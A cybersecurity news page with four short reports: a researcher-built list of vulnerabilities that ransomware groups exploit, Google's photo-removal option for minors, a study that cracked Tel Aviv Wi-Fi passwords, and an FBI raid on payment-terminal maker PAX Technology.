Connect with us

Experts create a list of vulnerabilities from the cyber ransomware arsenal



The initiator of the project is information security expert Allan Liska, and a number of experts in the field of security have joined him.

Security researchers are working to create a searchable list of vulnerabilities exploited by ransomware operators and their partners to gain initial access to victim networks.

The list is presented in the form of a diagram that provides information security experts with a starting point to protect their networks from ransomware attacks.


It all started with a call from Recorded Future cyber security expert Allan Liska, posted on Twitter last week. Liska stated about the intention to create a list of vulnerabilities exploited by the operators of ransomware, and since then several specialists have joined it.

Last week, a number of cyber ransomware partners began exploiting the recently patched Windows MSHTML Remote Code Execution vulnerability (CVE-2021-40444).

Earlier this month, Conti ransomware operators began attacking Microsoft Exchange servers to hack corporate networks through ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).

In August, the LockFile cyber ransomware group began to exploit the ProxyShell and PetitPotam (CVE-2021-36942) vulnerabilities to attack Windows domains around the world, Magniber operators armed themselves with exploits for PrintNightmare (CVE-2021-34527), and eCh0raix began to attack QNAP and Synology devices (CVE-2021-28799).

In July, ransomware operator HelloKitty attacked vulnerable SonicWall devices (CVE-2019-7481), and REvil hacked Kaseya (CVE-2021-30116, CVE-2021-30119, and CVE-2021-30120). FiveHands cyber ransomware, in turn, armed with the CVE-2021-20016 vulnerability in SonicWall.

In April, AgeLocker began attacking QNAP NAS devices through an undisclosed vulnerability in an outdated firmware. The Qlocker group also turned to QNAP devices and began to attack them through the vulnerability (CVE-2021-28799).

Around this time, Cring ransomware began encrypting non-updated Fortinet VPN devices (CVE-2018-13379) at industrial companies.

In March, Microsoft Exchange servers around the world were attacked by Black Kingdom and DearCry ransomware through ProxyLogon vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065).

In December-January 2020-2021, the Clop ransomware group attacked the Accellion servers (CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104), which led to an increase in the average ransom amount over the next three months.

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *


New feature from Google allows minors to remove their photos from search



This function was first introduced in August this year, but it has become widely available only now.

Google has launched a new security feature that allows individuals under the age of eighteen to submit requests to remove their photos from search results. For the first time, the company announced its plans to implement this function in August this year, but it has become widely available only now.

Anyone can start the process of deleting photos on this page support. To do this, you need to provide the URLs of the images that you want to remove from the search results, the search words for which the search engine gives these photos, the name and age of the minor, as well as the name of the person acting on his behalf, and the status (by whom, for example, parent, guardian, etc.).

As with other erasure requests, it is difficult to say what criteria Google will follow when making a decision. According to the company, images of all minors will be removed “except in cases of public interest or informational value.” It is difficult to say what this will mean in practice.

Based on Google’s wording, only requests from individuals who are currently under eighteen years of age will be accepted. It turns out that if a person is, say, thirty years old, then he will not be able to request the removal of photographs in which he is fifteen.

Google also notes that removing photos from search results does not mean removing them from the internet. The company advises users requesting deletion of snapshots to contact the webmaster first. However, if the appeal does not lead to anything, then removing images from Google search results will certainly be an important step.

Continue Reading


Information security expert hacked Wi-Fi networks in Tel Aviv to find out their reliability



The specialist managed to hack 73% of the 5 thousand studied wireless networks.

CyberArk employee Ido Hoorvitch conducted an interesting experiment to find out how strong passwords are for Wi-Fi networks in his hometown of Tel Aviv.

Using equipment to intercept Wi-Fi packets, Horwich collected a sample of 5,000 hashes of wireless networks and exploited a vulnerability to obtain PMKIDs (Pairwise Master Key Identifiers). To do this, he used a $ 50 NIC with monitoring and packet injection support and the WireShark tool.

PMKID is a hash generated using a password, access point MAC address, client MAC address, and wireless network name (SSID).

Horwich first tried to find out how many users had set their cell phone numbers as their wireless password (a common practice in Israel). To crack such a password, you just need to calculate all the combinations of numbers for Israeli phone numbers. Using a standard laptop, the researcher cracked 2,200 passwords; on average, breaking one password took 9 minutes.

Horwich then used the standard dictionary attack method. Using the Rockyou.txt dictionary, the expert managed to crack another 1,359 passwords (almost all of them used lowercase characters)

In total, Horwich was able to guess passwords to access 3,663 out of 5,000 (73%) of the studied wireless networks in Tel Aviv. The technical details of the study can be found here

Continue Reading


The FBI raids the American office of PAX Technology



The searches are related to the suspicion of the possible use of PAX equipment in cyberattacks.

Officials from the US Federal Bureau of Investigation raided the Florida office of PAX Technology, a Chinese PoS terminal manufacturer. How reported journalist Brian Krebs, the searches are related to reports of the possible use of PAX systems in cyber attacks against organizations in the United States and Europe.

PAX Technology is one of the world’s largest payment terminal manufacturers and a leading provider of trading solutions and services. The company is headquartered in Shenzhen, China.

According to information American radio station WOKV, the FBI and the Department of Homeland Security raided the PAX Technology warehouse in Jacksonville. Investigators said the searches were carried out on the basis of a court order as part of a federal investigation by the Department of Homeland Security with the participation of the Customs and Border Protection Directorate and the Naval Criminal Investigation Service. The FBI did not comment on the situation.

According to Krebs, citing trusted sources, the FBI launched an investigation into PAX after a major US payment service provider drew attention to strange network packets emanating from the company’s payment terminals. As it turned out, PAX terminals were used as a malware dropper and control infrastructure for organizing attacks and gathering information.

PAX Technology did not respond to Brian Krebs’s inquiry about the situation.

Two major financial providers in the US and UK have already begun to remove PAX terminals from the payment infrastructure, sources said.

“My sources say there is technical evidence for the use of terminals in cyberattacks. The packet sizes do not match the billing information they are supposed to send and do not correlate with the telemetry these devices are supposed to display in the event of a software update. PAX now claims the investigation is racially and politically motivated, ”the source said.

Krebs’ interlocutor did not provide details about the unusual network activity that led to the FBI investigation.

Continue Reading

Most Popular